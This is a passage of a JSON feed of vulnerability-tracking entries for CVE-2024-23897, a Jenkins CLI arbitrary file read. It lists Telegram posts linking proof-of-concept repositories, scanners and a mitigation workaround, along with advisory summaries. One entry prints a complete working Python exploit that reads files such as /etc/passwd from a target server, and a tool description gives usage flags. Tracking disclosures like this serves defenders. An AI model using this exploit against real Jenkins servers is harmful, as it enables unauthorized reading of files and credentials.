\nURL\uff1ahttps://github.com/pulentoski/CVE-2024-23897-Arbitrary-file-read\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-02-20T15:43:45.000000Z"}, {"uuid": "5456a2cc-19c2-4103-832c-2a655925a55a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/6642", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aUn script realizado en python para atumatizar la vulnerabilidad CVE-2024-23897 \nURL\uff1ahttps://github.com/pulentoski/CVE-2024-23897-scaner\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-03-14T16:12:54.000000Z"}, {"uuid": "743c334d-38cb-49cb-8d12-72f0656f0234", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/6520", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aThis repository presents a proof-of-concept of CVE-2024-23897\nURL\uff1ahttps://github.com/Vozec/CVE-2024-23897\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-01-28T02:01:26.000000Z"}, {"uuid": "cede1eb2-8554-48a9-ae7a-6485a8ec3510", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/6519", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-23897 - Jenkins \u4efb\u610f\u6587\u4ef6\u8bfb\u53d6 \u5229\u7528\u5de5\u5177\nURL\uff1ahttps://github.com/wjlin0/CVE-2024-23897\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-01-27T19:39:34.000000Z"}, {"uuid": "536098a6-6bbd-4c20-b7da-49bd4f946418", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/6556", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-23897 jenkins arbitrary file read which leads to unauthenticated RCE\nURL\uff1ahttps://github.com/brijne/CVE-2024-23897-RCE\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-02-02T23:18:02.000000Z"}, {"uuid": "9cbb67aa-1c12-4df5-b35c-767a32827420", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/6598", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-23897\nURL\uff1ahttps://github.com/B4CK4TT4CK/CVE-2024-23897\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-02-13T22:44:09.000000Z"}, {"uuid": "909dc774-3e32-4618-9030-1fcac4d5e5e0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/6515", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aon this git you can find all information on the CVE-2024-23897.\nURL\uff1ahttps://github.com/iota4/PoC-jenkins-rce_CVE-2024-23897.\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2024-01-27T13:29:00.000000Z"}, {"uuid": "7d8a69f2-192c-4819-bda6-6d54275903dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/6514", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-23897 jenkins-cli\nURL\uff1ahttps://github.com/CKevens/CVE-2024-23897\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-01-27T12:59:55.000000Z"}, {"uuid": "1bb32e73-4e38-41bb-a8dc-a8a3cbcfcecf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/6511", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aScanner for CVE-2024-23897 - Jenkins\nURL\uff1ahttps://github.com/yoryio/CVE-2024-23897\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-01-27T03:42:41.000000Z"}, {"uuid": "665efa85-a20f-4347-ab9e-d5d0572da630", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/6509", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-23897 | Jenkins <= 2.441 & <= LTS 2.426.2 PoC and scanner. \nURL\uff1ahttps://github.com/xaitax/CVE-2024-23897\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-01-26T19:18:16.000000Z"}, {"uuid": "0f025f92-db27-410c-a700-17bef1afb6d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/9039", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aJenkins CVE-2024-23897: Arbitrary File Read Vulnerability Leading to RCE\nURL\uff1ahttps://github.com/safeer-accuknox/BLOG-POC\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2024-11-15T02:33:45.000000Z"}, {"uuid": "ac4f497a-637b-493a-b7c5-67f9eee852fd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/6505", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-23897\nURL\uff1ahttps://github.com/h4x0r-dz/CVE-2024-23897\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-01-26T09:48:27.000000Z"}, {"uuid": "9aec4f67-5e0b-421f-83c1-e18fedbb3f06", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/6568", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aNuclei template for CVE-2024-23897 (Jenkins LFI Vulnerability)\nURL\uff1ahttps://github.com/kaanatmacaa/CVE-2024-23897\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-02-05T14:16:08.000000Z"}, {"uuid": "50ea712d-3140-4a5f-96e9-f44f2409a70a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/23071", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aJenkins RCE Arbitrary File Read CVE-2024-23897 \nURL\uff1ahttps://github.com/slytechroot/CVE-2024-23897\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2025-03-23T06:37:33.000000Z"}, {"uuid": "d916e59b-9056-403e-9715-4ce2b7639b6d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/6652", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aScraping tool to ennumerate directories or files with the CVE-2024-23897 vulnerability in Jenkins.\nURL\uff1ahttps://github.com/Nebian/CVE-2024-23897\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-02-21T18:52:28.000000Z"}, {"uuid": "fc4c9d7d-d4a4-4c14-8ec6-fbd8e6caf010", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "seen", "source": "https://t.me/GithubRedTeam/6641", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aWorkaround for disabling the CLI to mitigate SECURITY-3314/CVE-2024-23897 and SECURITY-3315/CVE-2024-23898\nURL\uff1ahttps://github.com/jenkinsci-cert/SECURITY-3314-3315\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-02-20T14:19:00.000000Z"}, {"uuid": "47ee21d6-42b4-4a0d-b543-51ea88ffa71e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7243", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1a[CVE-2024-23897] Jenkins CI Authenticated Arbitrary File Read Through the CLI Leads to Remote Code Execution (RCE)\nURL\uff1ahttps://github.com/murataydemir/CVE-2024-23897\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2024-05-07T14:46:25.000000Z"}, {"uuid": "de08e1bf-2795-4e59-9e5a-524ddbe8a47d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7204", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aJenkins CVE-2024-23897: Arbitrary File Read Vulnerability\nURL\uff1ahttps://github.com/Athulya666/CVE-2024-23897\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-05-03T08:30:08.000000Z"}, {"uuid": "dddaf722-60f5-46a0-8ddc-22047d49ea8d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/ETHICALHACKERSCOMMUNITY2/3725", "content": "Exploitation and scanning (https://www.kitploit.com/search/label/Scanning) tool specifically designed for Jenkins versions <= 2.441 & <= LTS 2.426.2. It leverages CVE-2024-23897 to assess and exploit vulnerabilities (https://www.kitploit.com/search/label/vulnerabilities) in Jenkins instances.  \nUsage\n Ensure you have the necessary permissions to scan (https://www.kitploit.com/search/label/Scan) and exploit the target systems. Use this tool responsibly and ethically. python CVE-2024-23897.py -t  -p  -f \n or python CVE-2024-23897.py -i  -f \n Parameters: - -t or --target: Specify the target IP(s). Supports single IP, IP range, comma-separated list, or CIDR (https://www.kitploit.com/search/label/CIDR) block. - -i or --input-file: Path to input file containing hosts in the format of http://1.2.3.4:8080/ (one per line). - -o or --output-file: Export results to file (optional). - -p or --port: Specify the port number. Default is 8080 (optional). - -f or --file: Specify the file to read on the target system. \nChangelog\n \n[27th January 2024] - Feature Request\n  Added scanning/exploiting via input file with hosts (-i INPUT_FILE).  Added export to file (-o OUTPUT_FILE).  \n[26th January 2024] - Initial Release\n  Initial release.  \nContributing\n Contributions are welcome. Please feel free to fork, modify, and make pull requests or report issues. \nAuthor\n Alexander Hagenah - URL (https://primepage.de/) - Twitter (https://twitter.com/xaitax) \nDisclaimer\n This tool is meant for educational and professional purposes only. Unauthorized scanning and exploiting (https://www.kitploit.com/search/label/Exploiting) of systems is illegal and unethical. Always ensure you have explicit permission to test and exploit any systems you target.\n\nDownload CVE-2024-23897 (https://github.com/xaitax/CVE-2024-23897)", "creation_timestamp": "2024-02-25T13:06:09.000000Z"}, {"uuid": "96c9f318-068e-4ec5-92d5-b60a2f7ad372", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7415", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aUn exploit con el que puedes aprovecharte de la vulnerabilidad (CVE-2024-23897)\nURL\uff1ahttps://github.com/Surko888/Surko-Exploit-Jenkys-CVE-2024-23897\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-05-26T09:39:01.000000Z"}, {"uuid": "4bf62894-e75b-465b-8569-7424d7794ed5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7416", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aUn exploit con el que puedes aprovecharte de la vulnerabilidad (CVE-2024-23897)\nURL\uff1ahttps://github.com/Surko888/Surko-Exploit-Jenkins-CVE-2024-23897\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-05-27T02:16:40.000000Z"}, {"uuid": "12bfefb1-2b4d-4f76-b5f2-f3cfa1ecbb40", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/tech_b0lt_Genona/4240", "content": "Jenkins \u0432\u044b\u043a\u0430\u0442\u0438\u043b Advisory\n\nJenkins Security Advisory 2024-01-24\nhttps://www.jenkins.io/security/advisory/2024-01-24/\n\n\u0418 \u0442\u0430\u043c \u0435\u0441\u0442\u044c \u043a\u043b\u0430\u0441\u0441\u043d\u043e\u0435\n\nArbitrary file read vulnerability through the CLI can lead to RCE\nCVE-2024-23897\nSeverity (CVSS): Critical\nThis allows attackers to read arbitrary files on the Jenkins controller file system using the default character encoding of the Jenkins controller process.\n\n- Attackers with Overall/Read permission can read entire files.\n\n- Attackers without Overall/Read permission can read the first few lines of files. The number of lines that can be read depends on available CLI commands. As of publication of this advisory, the Jenkins security team has found ways to read the first three lines of files in recent releases of Jenkins without having any plugins installed, and has not identified any plugins that would increase this line count.\n\n\u0418 \u0435\u0441\u0442\u044c PoC \u0443\u0436\u0435 \u0442\u043e\u0436\u0435\nhttps://github.com/h4x0r-dz/CVE-2024-23897\n\n\u041e\u0441\u043e\u0431\u0435\u043d\u043d\u043e\u0441\u0442\u044c\u044e \u043f\u0430\u0440\u0441\u0435\u0440\u0430 \u043a\u043e\u043c\u0430\u043d\u0434, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0449\u0435\u0433\u043e\u0441\u044f \u0432 Jenkins, \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0437\u0430\u043c\u0435\u043d\u0430 \u0441\u0438\u043c\u0432\u043e\u043b\u0430 \"@\" \u043d\u0430 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u0444\u0430\u0439\u043b\u0430, \u0435\u0441\u043b\u0438 \u043f\u0443\u0442\u044c \u043a \u0444\u0430\u0439\u043b\u0443 \u0441\u043b\u0435\u0434\u0443\u0435\u0442 \u0437\u0430 \u044d\u0442\u0438\u043c \u0441\u0438\u043c\u0432\u043e\u043b\u043e\u043c \u0432 \u0430\u0440\u0433\u0443\u043c\u0435\u043d\u0442\u0435 \u043a\u043e\u043c\u0430\u043d\u0434\u044b. \u042d\u0442\u0430 \u0444\u0443\u043d\u043a\u0446\u0438\u044f \u0430\u043a\u0442\u0438\u0432\u0438\u0440\u043e\u0432\u0430\u043d\u0430 \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e \u0432 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 Jenkins 2.441 \u0438 \u0431\u043e\u043b\u0435\u0435 \u0440\u0430\u043d\u043d\u0438\u0445, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0432 LTS 2.426.2 \u0438 \u0431\u043e\u043b\u0435\u0435 \u0440\u0430\u043d\u043d\u0438\u0445, \u0438 \u0434\u043e \u043d\u0435\u0434\u0430\u0432\u043d\u0435\u0433\u043e \u0432\u0440\u0435\u043c\u0435\u043d\u0438 \u043d\u0435 \u0431\u044b\u043b\u0430 \u043e\u0442\u043a\u043b\u044e\u0447\u0435\u043d\u0430.\n. . .\n\u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043e\u043a \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d \u0434\u043b\u044f \u0447\u0442\u0435\u043d\u0438\u044f \u0431\u0438\u043d\u0430\u0440\u043d\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432, \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0449\u0438\u0445 \u043a\u0440\u0438\u043f\u0442\u043e\u0433\u0440\u0430\u0444\u0438\u0447\u0435\u0441\u043a\u0438\u0435 \u043a\u043b\u044e\u0447\u0438, \u0445\u043e\u0442\u044f \u0438 \u0441 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u043d\u044b\u043c\u0438 \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u0438\u044f\u043c\u0438. \u0418\u0437\u0432\u043b\u0435\u0447\u0435\u043d\u0438\u0435 \u0441\u0435\u043a\u0440\u0435\u0442\u043e\u0432 \u043e\u0442\u043a\u0440\u044b\u0432\u0430\u0435\u0442 \u043f\u0443\u0442\u044c \u043a \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u043c \u0430\u0442\u0430\u043a\u0430\u043c:\n\n- \u0423\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043a\u043e\u0434\u0430 \u0447\u0435\u0440\u0435\u0437 \u043a\u043e\u0440\u043d\u0435\u0432\u044b\u0435 URL-\u0430\u0434\u0440\u0435\u0441\u0430 \u0440\u0435\u0441\u0443\u0440\u0441\u043e\u0432;\n- \u0423\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043a\u043e\u0434\u0430 \u0447\u0435\u0440\u0435\u0437 cookie-\u0444\u0430\u0439\u043b \u00ab\u0417\u0430\u043f\u043e\u043c\u043d\u0438\u0442\u044c \u043c\u0435\u043d\u044f\u00bb;\n- \u0423\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043a\u043e\u0434\u0430 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e XSS-\u0430\u0442\u0430\u043a (Cross-Site Scripting, XSS) \u0447\u0435\u0440\u0435\u0437 \u0436\u0443\u0440\u043d\u0430\u043b\u044b \u0441\u0431\u043e\u0440\u043a\u0438;\n- \u0423\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043a\u043e\u0434\u0430 \u0447\u0435\u0440\u0435\u0437 \u043e\u0431\u0445\u043e\u0434 \u0437\u0430\u0449\u0438\u0442\u044b CSRF (Cross-Site Request Forgery);\n- \u0420\u0430\u0441\u0448\u0438\u0444\u0440\u043e\u0432\u043a\u0430 \u0441\u0435\u043a\u0440\u0435\u0442\u043e\u0432, \u0445\u0440\u0430\u043d\u044f\u0449\u0438\u0445\u0441\u044f \u0432 Jenkins;\n- \u0423\u0434\u0430\u043b\u0435\u043d\u0438\u0435 \u043b\u044e\u0431\u043e\u0433\u043e \u044d\u043b\u0435\u043c\u0435\u043d\u0442\u0430 \u0432 Jenkins;\n- \u0417\u0430\u0433\u0440\u0443\u0437\u043a\u0430 \u0434\u0430\u043c\u043f\u0430 \u043a\u0443\u0447\u0438 Java.\n\nhttps://www.securitylab.ru/news/545554.php", "creation_timestamp": "2024-01-27T12:30:14.000000Z"}, {"uuid": "381790b9-d141-48be-ba9d-5326eba9d886", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "Telegram/BJFlaDl_9BJZma2LgARVypNYw9rydPG4dhbOcWVAV8nGsFg", "content": "", "creation_timestamp": "2026-04-23T09:00:04.000000Z"}, {"uuid": "c8542413-9c9e-4d99-8bde-aed591acb179", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/ETHICALHACKERSCOMMUNITY2/3723", "content": "CVE-2024-23897 - Jenkins <= 2.441 & <= LTS 2.426.2 PoC And Scanner\nhttp://www.kitploit.com/2024/02/cve-2024-23897-jenkins-2441-lts-24262.html", "creation_timestamp": "2024-02-28T12:52:17.000000Z"}, {"uuid": "a6999d34-1950-42e6-b77c-7616520bca4e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/poxek/3618", "content": "Jenkins RCE Arbitrary File Read CVE-2024-23897 \n\n\u041a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 Jenkins. \u041f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c RCE \u043d\u0430 \u0430\u0442\u0430\u043a\u0443\u0435\u043c\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u0435 \u0447\u0435\u0440\u0435\u0437 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0439 \u043c\u043e\u0434\u0443\u043b\u044c args4j. \u042d\u0442\u0430 \u0444\u0443\u043d\u043a\u0446\u0438\u044f \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u0430 \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e, \u0438 \u0432 Jenkins 2.441 \u0438 \u0431\u043e\u043b\u0435\u0435 \u0440\u0430\u043d\u043d\u0438\u0445 \u0432\u0435\u0440\u0441\u0438\u044f\u0445, LTS 2.426.2 \u0438 \u0431\u043e\u043b\u0435\u0435 \u0440\u0430\u043d\u043d\u0438\u0445 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 \u043e\u043d\u0430 \u043d\u0435 \u043e\u0442\u043a\u043b\u044e\u0447\u0430\u0435\u0442\u0441\u044f.\n\nPoC\nimport threading\nimport http.client\nimport time\nimport uuid\nimport urllib.parse\nimport sys\n\nif len(sys.argv) != 3:\n    print('[*] usage: python poc.py http://127.0.0.1:8888/ [/etc/passwd]')\n    exit()\n\ndata_bytes = b'\\x00\\x00\\x00\\x06\\x00\\x00\\x04help\\x00\\x00\\x00\\x0e\\x00\\x00\\x0c@' + sys.argv[2].encode() + b'\\x00\\x00\\x00\\x05\\x02\\x00\\x03GBK\\x00\\x00\\x00\\x07\\x01\\x00\\x05zh_CN\\x00\\x00\\x00\\x00\\x03'\ntarget = urllib.parse.urlparse(sys.argv[1])\nuuid_str = str(uuid.uuid4())\n\nprint(f'REQ: {data_bytes}\\n')\n\ndef req1():\n    conn = http.client.HTTPConnection(target.netloc)\n    conn.request(\"POST\", \"/cli?remoting=false\", headers={\n        \"Session\": uuid_str,\n        \"Side\": \"download\"\n    })\n    print(f'RESPONSE: {conn.getresponse().read()}')\n\ndef req2():\n    conn = http.client.HTTPConnection(target.netloc)\n    conn.request(\"POST\", \"/cli?remoting=false\", headers={\n        \"Session\": uuid_str,\n        \"Side\": \"upload\",\n        \"Content-type\": \"application/octet-stream\"\n    }, body=data_bytes)\n\nt1 = threading.Thread(target=req1)\nt2 = threading.Thread(target=req2)\n\nt1.start()\ntime.sleep(0.1)\nt2.start()\n\nt1.join()\nt2.join()\n\n\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435: \npython poc.py http://127.0.0.1:8888/ [/etc/passwd]\n\n\u041e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435:\n\u041e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u0434\u043e Jenkins 2.442, LTS 2.426.3\n\n\u041f\u0430\u0442\u0447:\n\u0415\u0441\u043b\u0438 \u0432\u044b \u043d\u0435 \u043c\u043e\u0436\u0435\u0442\u0435 \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u044c\u0441\u044f \u0434\u043e \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0435\u0439 \u0432\u0435\u0440\u0441\u0438\u0438, \u0442\u043e \u043e\u0442\u043a\u043b\u044e\u0447\u0438\u0442\u0435 \u0434\u043e\u0441\u0442\u0443\u043f \u043a CLI, \u044d\u0442\u043e \u0434\u043e\u043b\u0436\u043d\u043e \u043f\u043e\u043b\u043d\u043e\u0441\u0442\u044c\u044e \u0438\u0441\u043a\u043b\u044e\u0447\u0438\u0442\u044c \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438.\n\n\ud83c\udf1a @poxek", "creation_timestamp": "2024-01-26T10:20:52.000000Z"}, {"uuid": "79e46fa9-fb53-4738-a6da-4644fb7ff045", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/poxek/3620", "content": "Jenkins nuclei-template\nRCE Arbitrary File Read CVE-2024-23897\n\n\u041f\u043e\u043a\u0430 \u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u043d\u0435 \u0434\u043e\u0431\u0430\u0432\u0438\u043b\u0438 \u0432 nuclei-template. \u042f \u043d\u0435 \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u043b \u0435\u0449\u0451. \u041d\u0435 